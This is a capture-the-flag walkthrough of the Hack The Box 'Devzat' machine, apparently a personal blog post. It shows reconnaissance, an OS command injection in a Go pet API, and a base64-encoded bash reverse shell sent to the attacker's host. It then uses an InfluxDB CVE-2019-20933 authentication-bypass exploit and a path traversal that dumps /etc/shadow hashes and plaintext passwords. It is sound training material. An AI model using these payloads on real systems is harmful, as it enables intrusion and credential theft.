Hack-The-Box-walkthrough[devzat]

Posted on Edited on In Views: Word count in article: 3.5k Reading time ≈ 13 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 16 Oct 2021
IP: 10.10.11.118

  • my htb rank

Enumeration

Nmap

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.118
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41
8000/tcp open  ssh     (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=10/19%Time=616EC117%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals three open ports, two of them are SSH and one HTTP and it also reveals the hostname, add that to hosts file and access HTTP.

Devzat is actually an application designed to chat with developers over SSH.

  • devzat

Let’s access the chat.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# ssh -l test devzat.htb -p 8000
The authenticity of host '[devzat.htb]:8000 ([10.10.11.118]:8000)' can't be established.
RSA key fingerprint is SHA256:f8dMo2xczXRRA43d9weJ7ReJdZqiCxw5vP7XqBaZutI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[devzat.htb]:8000,[10.10.11.118]:8000' (RSA) to the list of known hosts.
                                                                                                        2 hours 27 minutes earlier
id
devbot:  has left the chat
                                                                                                        2 hours 15 minutes earlier
devbot: pets has joined the chat
                                                                                                        2 hours 14 minutes earlier
devbot: hoge has joined the chat
                                                                                                        2 hours 12 minutes earlier
pets: example-code
                                                                                                         2 hours 7 minutes earlier
devbot: pets has left the chat
devbot: pets stayed on for 8 minutes
                                                                                                          1 hour 8 minutes earlier
devbot: hoge has left the chat
devbot: hoge stayed on for 1 hour 6 minutes
                                                                                                                38 minutes earlier
devbot: You seem to be new here catharine. Welcome to Devzat! Run /help to see what you can do.
devbot: catharine has joined the chat
devbot: catharine has left the chat
devbot: patrick has joined the chat
devbot: patrick has left the chat
devbot: admin has joined the chat
                                                                                                                37 minutes earlier
devbot: admin has left the chat
Welcome to the chat. There are no more users
devbot: test has joined the chat
test: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!

There’s nothing much which can help us to gain shell access. Let’s look for any vhosts.

1
2
3
ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

pets [Status: 200, Size: 510, Words: 20, Lines: 21]

We got one vhost, let’s add that to hosts file and access it.

It’s a pet inventory, where we can add pet names. Let’s look for any Directory’s.

1
2
3
4
5
6
ffuf -u http://pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -fs 510

css [Status: 301, Size: 40, Words: 3, Lines: 3]
build [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
.git [Status: 301, Size: 41, Words: 3, Lines: 3]

We got ‘.git’ directory, let’s dump and extract the commits.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# /root/GitTools-master/Dumper/gitdumper.sh http://pets.devzat.htb/.git/ pets
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating pets/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/ef/07a04ebb2fc92cf74a39e0e4b843630666a705
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/82/74d7a547c0c3854c074579dfc359664082a8f6
[+] Downloaded: objects/46/4614f32483e1fde60ee53f5d3b4d468d80ff62
[+] Downloaded: objects/55/1abaa3c707703936e5e31b8e4645b35e5f6c07
[+] Downloaded: objects/3a/e86c86b0053b79cdbfc1456d6059986a9d3813
[+] Downloaded: objects/8d/a69971e32e6e08cae489b40731845d1de13258
[+] Downloaded: objects/93/28c7f72254a754c91fddfd3c7e62c1251a2828
[+] Downloaded: objects/2f/37bf8e3a0ce61b74fec752fad017c363511d31
[+] Downloaded: objects/69/f1153887d2790c94f23a00c6f85958cf198418
[+] Downloaded: objects/53/5028803d222b0e4e9174f56529c0ed9fece4e0
[+] Downloaded: objects/54/f95a54c49178dd5d496058e4ee99829748c49a
......
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/hackthebox/machine/devzat/pets]
└─# /root/GitTools-master/Extractor/extractor.sh . pets
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 8274d7a547c0c3854c074579dfc359664082a8f6
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/.gitignore
[+] Found folder: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/bluewhale
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/cat
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/dog
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/giraffe
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/gopher
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/petshop
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/characteristics/redkite
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/go.mod
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/go.sum
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/main.go
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/petshop
[+] Found file: /root/hackthebox/machine/devzat/pets/pets/0-8274d7a547c0c3854c074579dfc359664082a8f6/start.sh
......

vuln confirm

We got the source code, let’s dig in.

  • main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
package main

import (
        "embed"
        "encoding/json"
        "fmt"
        "io/fs"
        "io/ioutil"
        "log"
        "net/http"
        "os/exec"
        "time"
)

//go:embed static/public
var web embed.FS

//go:embed static/public/index.html
var index []byte

type Pet struct {
        Name            string `json:"name"`
        Species         string `json:"species"`
        Characteristics string `json:"characteristics"`
}

var (
        Pets []Pet = []Pet{
                {Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
                {Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
                {Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
                {Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
                {Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
                {Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
                {Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
                {Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
        }
)

func loadCharacter(species string) string {
        cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
        stdoutStderr, err := cmd.CombinedOutput()
        if err != nil {
                return err.Error()
        }
        return string(stdoutStderr)
}

func getPets(w http.ResponseWriter, r *http.Request) {
        json.NewEncoder(w).Encode(Pets)
}

func addPet(w http.ResponseWriter, r *http.Request) {
        reqBody, _ := ioutil.ReadAll(r.Body)
        var addPet Pet
        err := json.Unmarshal(reqBody, &addPet)
        if err != nil {
                e := fmt.Sprintf("There has been an error: %+v", err)
                http.Error(w, e, http.StatusBadRequest)
                return
        }

        addPet.Characteristics = loadCharacter(addPet.Species)
        Pets = append(Pets, addPet)

        w.WriteHeader(http.StatusOK)
        fmt.Fprint(w, "Pet was added successfully")
}

func handleRequest() {
        build, err := fs.Sub(web, "static/public/build")
        if err != nil {
                panic(err)
        }

        css, err := fs.Sub(web, "static/public/css")
        if err != nil {
                panic(err)
        }

        spaHandler := http.HandlerFunc(spaHandlerFunc)
        // Single page application handler
        http.Handle("/", headerMiddleware(spaHandler))

        // All static folder handler
        http.Handle("/build/", headerMiddleware(http.StripPrefix("/build", http.FileServer(http.FS(build)))))
        http.Handle("/css/", headerMiddleware(http.StripPrefix("/css", http.FileServer(http.FS(css)))))
        http.Handle("/.git/", headerMiddleware(http.StripPrefix("/.git", http.FileServer(http.Dir(".git")))))

        // API routes
        apiHandler := http.HandlerFunc(petHandler)
        http.Handle("/api/pet", headerMiddleware(apiHandler))
        log.Fatal(http.ListenAndServe("127.0.0.1:5000", nil))
}

func spaHandlerFunc(w http.ResponseWriter, r *http.Request) {
        w.WriteHeader(http.StatusOK)
        w.Write(index)
}

func petHandler(w http.ResponseWriter, r *http.Request) {
        // Dispatch by method
        if r.Method == http.MethodPost {
                addPet(w, r)
        } else if r.Method == http.MethodGet {
                getPets(w, r)

        } else {
                http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
        }
        // TODO: Add Update and Delete
}

func headerMiddleware(next http.Handler) http.Handler {
        return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
                w.Header().Add("Server", "My genious go pet server")
                next.ServeHTTP(w, r)
        })
}

func main() {
        resetTicker := time.NewTicker(5 * time.Second)
        done := make(chan bool)

        go func() {
                for {
                        select {
                        case <-done:
                                return
                        case <-resetTicker.C:
                                // Reset Pets to prestaged ones
                                Pets = []Pet{
                                        {Name: "Cookie", Species: "cat", Characteristics: loadCharacter("cat")},
                                        {Name: "Mia", Species: "cat", Characteristics: loadCharacter("cat")},
                                        {Name: "Chuck", Species: "dog", Characteristics: loadCharacter("dog")},
                                        {Name: "Balu", Species: "dog", Characteristics: loadCharacter("dog")},
                                        {Name: "Georg", Species: "gopher", Characteristics: loadCharacter("gopher")},
                                        {Name: "Gustav", Species: "giraffe", Characteristics: loadCharacter("giraffe")},
                                        {Name: "Rudi", Species: "redkite", Characteristics: loadCharacter("redkite")},
                                        {Name: "Bruno", Species: "bluewhale", Characteristics: loadCharacter("bluewhale")},
                                }

                        }
                }
        }()

        handleRequest()

        time.Sleep(500 * time.Millisecond)
        resetTicker.Stop()
        done <- true
}

Species is vulnerable to OS command injection. Add a pet name and intercept the request.

Let’s first try to get a ping request back to our machine. Make sure to setup a tcpdump. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pets.devzat.htb/
Content-Type: text/plain;charset=UTF-8
Origin: http://pets.devzat.htb
Content-Length: 53
Connection: close


{"name":"luci","species":"cat;ping -c 4 10.10.14.12"}

Forward the request and check tcpdump.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:46:30.479050 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 1, length 64
09:46:30.479081 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 1, length 64
09:46:31.381887 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 2, length 64
09:46:31.381909 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 2, length 64
09:46:32.286606 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 3, length 64
09:46:32.286624 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 3, length 64
09:46:33.196134 IP devzat.htb > 10.10.14.12: ICMP echo request, id 2, seq 4, length 64
09:46:33.196149 IP 10.10.14.12 > devzat.htb: ICMP echo reply, id 2, seq 4, length 64

We got 4 hits from the machine. Let’s gain a reverse shell via this vulnerability. Let’s encode our bash one-liner and send the request.

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# echo -n 'bash -i >& /dev/tcp/10.10.14.12/9001 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi85MDAxIDA+JjE=
  • payload:
1
cat;echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi85MDAxIDA+JjE= | base64 -d | bash

Check the listener.

Stabilize the shell and run linpeas.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nc -lvp 9001                                                                                                                  
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.118.
Ncat: Connection from 10.10.11.118:50764.
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:~/pets$ whoami
whoami
patrick
patrick@devzat:~/pets$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

$ stty raw -echo
$ fg

$ reset
$ screen
patrick@devzat:~$ find / -name "user.txt" 2>/dev/null
/home/catherine/user.txt
patrick@devzat:~$ cat /home/catherine/user.txt
cat: /home/catherine/user.txt: Permission denied

You will find a process and port and application name.

1
root 1229 0.0 0.1 550720 3856 ? Sl Oct16 0:00 _ /usr/bin/docker-proxy-proto tcp -host-ip 127.0.0.1 -host-port 8086 -container-ip 172.17.0.2 -container-port 8086

Let’s forward that port to our kali machine.

  • in kali machine
1
2
3
4
5
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# ./chisel server -p 8000 --reverse
2021/10/19 09:57:19 server: Reverse tunnelling enabled
2021/10/19 09:57:19 server: Fingerprint 3b:f7:31:4d:44:c5:fa:8a:b8:e7:c3:37:bb:0d:40:5f
2021/10/19 09:57:19 server: Listening on http://0.0.0.0:8000
  • in target machine
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
patrick@devzat:/tmp$ wget 10.10.14.12/chisel
--2021-10-19 14:01:09--  http://10.10.14.12/chisel
Connecting to 10.10.14.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8687616 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel              100%[===================>]   8.29M   481KB/s    in 20s     

2021-10-19 14:01:30 (415 KB/s) - ‘chisel’ saved [8687616/8687616]

patrick@devzat:/tmp$ chmod 777 chisel
patrick@devzat:/tmp$ ./chisel client 10.10.14.12:8000 R:8086:127.0.0.1:8086 &
[1] 76754
patrick@devzat:/tmp$ 2021/10/19 14:01:46 client: Connecting to ws://10.10.14.12:8000
2021/10/19 14:01:47 client: Fingerprint 3b:f7:31:4d:44:c5:fa:8a:b8:e7:c3:37:bb:0d:40:5f
2021/10/19 14:01:48 client: Connected (Latency 199.990409ms)

get user

Let’s do a service enumeration on this port.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 10:02 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000058s latency).

PORT     STATE SERVICE VERSION
8086/tcp open  http    InfluxDB http admin 1.7.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds

InfluxDB 1.7.5 is running on docker, let’s look for any vulnerability.

  • InfluxDB 1.7 release notes InfluxDB OSS 1.7 Documentation

TL;DR

The vulnerability allows a remote attacker to bypass authentication process. The vulnerability exists due the JWT token may have an empty SharedSecret in the authenticate function in services/httpd/handler.go. A remote non-authenticated attacker can bypass authentication process and gain unauthorized access to the application.

  • When all else fails - find a 0-day

We can exploit it manually by understanding the above blog and steps. Or we can automate with below poc.

  • InfluxDB Exploit CVE-2019-20933
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
┌──(root💀kali)-[~/hackthebox/machine/devzat]
└─# python3 /root/InfluxDB-Exploit-CVE-2019-20933/__main__.py 
  _____        __ _            _____  ____    ______            _       _ _   
 |_   _|      / _| |          |  __ \|  _ \  |  ____|          | |     (_) |  
   | |  _ __ | |_| |_   ___  __ |  | | |_) | | |__  __  ___ __ | | ___  _| |_ 
   | | | '_ \|  _| | | | \ \/ / |  | |  _ <  |  __| \ \/ / '_ \| |/ _ \| | __|
  _| |_| | | | | | | |_| |>  <| |__| | |_) | | |____ >  <| |_) | | (_) | | |_ 
 |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                                         | |                  
                                                         |_|                  
CVE-2019-20933

Insert ip host (default localhost): 
Insert port (default 8086): 
Insert influxdb user (wordlist path to bruteforce username): /usr/share/seclists/Usernames/Names/names.txt

Start username bruteforce
[x] aaliyah
[x] aaren
[x] aarika
[x] aaron
[x] aartjan
[x] aarushi
[x] abagael
[x] abagail
[x] abahri
[x] abbas
[x] abbe
[x] abbey
[x] abbi
[x] abbie
[x] abby
[x] abbye
[x] abdalla
[x] abdallah
[x] abdul
[x] abdullah
[x] abe
[x] abel
[x] abi
[x] abia
[x] abigael
[x] abigail
[x] abigale
......
Host vulnerable !!!
Databases list:

1) devzat
2) _internal

Insert database name (exit to close): devzat
[devzat] Insert query (exit to change db): SELECT * FROM "user"
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci",
                            "catherine"
                        ],
                        [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}

We got catherine user’s creds. Let’s login, SSH won’t work. So use ‘su’.

1
2
3
4
5
patrick@devzat:/tmp$ su catherine
Password: 
catherine@devzat:/tmp$ cd ~
catherine@devzat:~$ cat user.txt 
9919bf525c5b8306176eaa39e17110d5

get root

We got the user flag, let’s run the linpeas one more time.

1
2
3
4
5
#)You_can_write_even_more_files_inside_last_directory
/var/backups/devzat-dev.zip
/var/backups/devzat-main.zip
/var/crash
/var/tmp

Under backups there are two zip files, lets copy them to /tmp location and extract both.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
catherine@devzat:/tmp$ unzip devzat-dev.zip
Archive:  devzat-dev.zip
   creating: dev/
  inflating: dev/go.mod              
 extracting: dev/.gitignore          
  inflating: dev/util.go             
  inflating: dev/testfile.txt        
  inflating: dev/eastereggs.go       
  inflating: dev/README.md           
  inflating: dev/games.go            
  inflating: dev/colors.go           
 extracting: dev/log.txt             
  inflating: dev/commands.go         
  inflating: dev/start.sh            
  inflating: dev/devchat.go          
  inflating: dev/LICENSE             
  inflating: dev/commandhandler.go   
  inflating: dev/art.txt             
  inflating: dev/go.sum              
 extracting: dev/allusers.json       
catherine@devzat:/tmp$ unzip devzat-main.zip
Archive:  devzat-main.zip
   creating: main/
  inflating: main/go.mod             
 extracting: main/.gitignore         
  inflating: main/util.go            
  inflating: main/eastereggs.go      
  inflating: main/README.md          
  inflating: main/games.go           
  inflating: main/colors.go          
 extracting: main/log.txt            
  inflating: main/commands.go        
  inflating: main/start.sh           
  inflating: main/devchat.go         
  inflating: main/LICENSE            
  inflating: main/commandhandler.go  
  inflating: main/art.txt            
  inflating: main/go.sum             
  inflating: main/allusers.json

After extraction, you will find almost identical files and it’s content. However, if you look at the difference between commands.go file, we will find something interesting.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
catherine@devzat:/tmp$ diff main/commands.go dev/commands.go
3a4
>       "bufio"
4a6,7
>       "os"
>       "path/filepath"
36a40
>               file        = commandInfo{"file", "Paste a files content directly to chat [alpha]", fileCommand, 1, false, nil}
38c42,101
<       commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode}
---
>       commands = []commandInfo{clear, message, users, all, exit, bell, room, kick, id, _commands, nick, color, timezone, emojis, help, tictactoe, hangman, shrug, asciiArt, exampleCode, file}
> }
> 
> func fileCommand(u *user, args []string) {
>       if len(args) < 1 {
>               u.system("Please provide file to print and the password")
>               return
>       }
> 
>       if len(args) < 2 {
>               u.system("You need to provide the correct password to use this function")
>               return
>       }
> 
>       path := args[0]
>       pass := args[1]
> 
>       // Check my secure password
>       if pass != "CeilingCatStillAThingIn2021?" {
>               u.system("You did provide the wrong password")
>               return
>       }
> 
>       // Get CWD
>       cwd, err := os.Getwd()
>       if err != nil {
>               u.system(err.Error())
>       }
> 
>       // Construct path to print
>       printPath := filepath.Join(cwd, path)
> 
>       // Check if file exists
>       if _, err := os.Stat(printPath); err == nil {
>               // exists, print
>               file, err := os.Open(printPath)
>               if err != nil {
>                       u.system(fmt.Sprintf("Something went wrong opening the file: %+v", err.Error()))
>                       return
>               }
>               defer file.Close()
> 
>               scanner := bufio.NewScanner(file)
>               for scanner.Scan() {
>                       u.system(scanner.Text())
>               }
> 
>               if err := scanner.Err(); err != nil {
>                       u.system(fmt.Sprintf("Something went wrong printing the file: %+v", err.Error()))
>               }
> 
>               return
> 
>       } else if os.IsNotExist(err) {
>               // does not exist, print error
>               u.system(fmt.Sprintf("The requested file @ %+v does not exist!", printPath))
>               return
>       }
>       // bokred?
>       u.system("Something went badly wrong.")

A new function is available in dev, that is file reading capabilities. But, it asks for the password and password if defined in the code. This new function is not available on the application which is running on port 8000, it is on 8443. So, access this port and read the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
catherine@devzat:/tmp$ ssh -l test localhost -p 8443
                                                      2 hours 10 minutes earlier
catharine: file
devbot: catharine has left the chat
devbot: catharine stayed on for 2 minutes
                                                       2 hours 6 minutes earlier
devbot: admin has joined the chat
admin: file
devbot: admin has left the chat
                                                       1 hour 54 minutes earlier
devbot: patrick has joined the chat
devbot: patrick has left the chat
devbot: patrick stayed on for 1 minute
                                                       1 hour 48 minutes earlier
devbot: catherine has joined the chat
catherine: file /etc/passwd woBeeYareedahc7Oogeephies7Aiseci
                                                       1 hour 44 minutes earlier
devbot: catherine has left the chat
devbot: catherine stayed on for 4 minutes
                                                       1 hour 39 minutes earlier
devbot: catherine has joined the chat
                                                       1 hour 23 minutes earlier
devbot: catherine has left the chat
devbot: catherine stayed on for 16 minutes
Welcome to the chat. There are no more users
devbot: test has joined the chat
                                                                     1 minute in
test: /file ../root.txt CeilingCatStillAThingIn2021?
[SYSTEM] 67f13f5a6aa22e9cf52f57f19c76f86d
test: /file ../etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] The requested file @ /root/etc/shadow does not exist!
test: /file /etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] The requested file @ /root/devzat/etc/shadow does not exist!
                                                                    3 minutes in
test: /file ../../etc/shadow CeilingCatStillAThingIn2021?
[SYSTEM] root:$6$DKdyL4hqyhhxcRyc$8N.1K/dHPqLb7VSB0IvfB.uhIKsH7IeGP/iyTRSYImFiAa
         wsaUOKs/TWe0DCp5wSscYvi.XjX8JPe6lZNnEmH/:18891:0:99999:7:::
[SYSTEM] daemon:*:18659:0:99999:7:::
[SYSTEM] bin:*:18659:0:99999:7:::
[SYSTEM] sys:*:18659:0:99999:7:::
[SYSTEM] sync:*:18659:0:99999:7:::
[SYSTEM] games:*:18659:0:99999:7:::
[SYSTEM] man:*:18659:0:99999:7:::
[SYSTEM] lp:*:18659:0:99999:7:::
[SYSTEM] mail:*:18659:0:99999:7:::
[SYSTEM] news:*:18659:0:99999:7:::
[SYSTEM] uucp:*:18659:0:99999:7:::
[SYSTEM] proxy:*:18659:0:99999:7:::
[SYSTEM] www-data:*:18659:0:99999:7:::
[SYSTEM] backup:*:18659:0:99999:7:::
[SYSTEM] list:*:18659:0:99999:7:::
[SYSTEM] irc:*:18659:0:99999:7:::
[SYSTEM] gnats:*:18659:0:99999:7:::
[SYSTEM] nobody:*:18659:0:99999:7:::
[SYSTEM] systemd-network:*:18659:0:99999:7:::
[SYSTEM] systemd-resolve:*:18659:0:99999:7:::
[SYSTEM] systemd-timesync:*:18659:0:99999:7:::
[SYSTEM] messagebus:*:18659:0:99999:7:::
[SYSTEM] syslog:*:18659:0:99999:7:::
[SYSTEM] _apt:*:18659:0:99999:7:::
[SYSTEM] tss:*:18659:0:99999:7:::
[SYSTEM] uuidd:*:18659:0:99999:7:::
[SYSTEM] tcpdump:*:18659:0:99999:7:::
[SYSTEM] landscape:*:18659:0:99999:7:::
[SYSTEM] pollinate:*:18659:0:99999:7:::
[SYSTEM] sshd:*:18800:0:99999:7:::
[SYSTEM] systemd-coredump:!!:18800::::::
[SYSTEM] patrick:$6$7ni9PM4l99B7EKPi$/uLBm1IhrKmkS9xPaIgRRZj8aVfASc4eIZt.FvNDEz2
         r06MIsQMEf3bNegOIxGI./UsabjqsRSV6hWxrJrqbj0:18800:0:99999:7:::
[SYSTEM] catherine:$6$.T9ZmexDFzOpXCH/$u9TICZ3NN5HOC1lWNHGuXP0Hyn/R8HMPS12kUgFdP
         AwUNl8F3qd5yuL6ptmW40IrBLxBMOTjskHfu1CwK72bw0:18800:0:99999:7:::
[SYSTEM] usbmux:*:18800:0:99999:7:::
